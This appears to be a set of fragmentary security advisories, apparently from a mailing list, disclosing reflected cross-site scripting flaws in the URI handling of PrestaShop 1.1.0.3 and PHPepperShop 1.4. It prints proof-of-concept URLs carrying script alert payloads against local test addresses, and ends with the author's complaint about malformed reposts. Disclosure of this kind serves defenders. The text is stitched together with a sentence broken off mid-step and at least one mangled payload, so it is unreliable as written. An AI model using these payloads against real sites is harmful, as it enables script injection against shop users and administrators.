Affects PrestaShop 1.1.0.3
product: homepage: http://prestashop.com
This is XSS in the URI of PrestaShop. Trust no one, not even your
$_SERVER[PHP_SELF] .
http://10.1.1.155/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealert(1)%3C/script%3E
Add an item to the shoping cart and then vist
Vulnerable Version:PHPepperShop v 1.4
Homepage:http://www.phpeppershop.com
This is 4 reflective XSS flaws in the URI. Trust no one not even your
$_SERVER[PHP_SELF]
http://10.1.1.10/shop/kontakt.php/'scriptalert(1)/script
http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E
Author: Michael Brooks ()
I usually don't like posting my leet exploits to bugtraq because it is so
unprofessional. You guys usually malform my exploits so they are totally
useless, even to someone trying to write a patch! You also tend to get the
wrong name! Michael Brooks wrote this!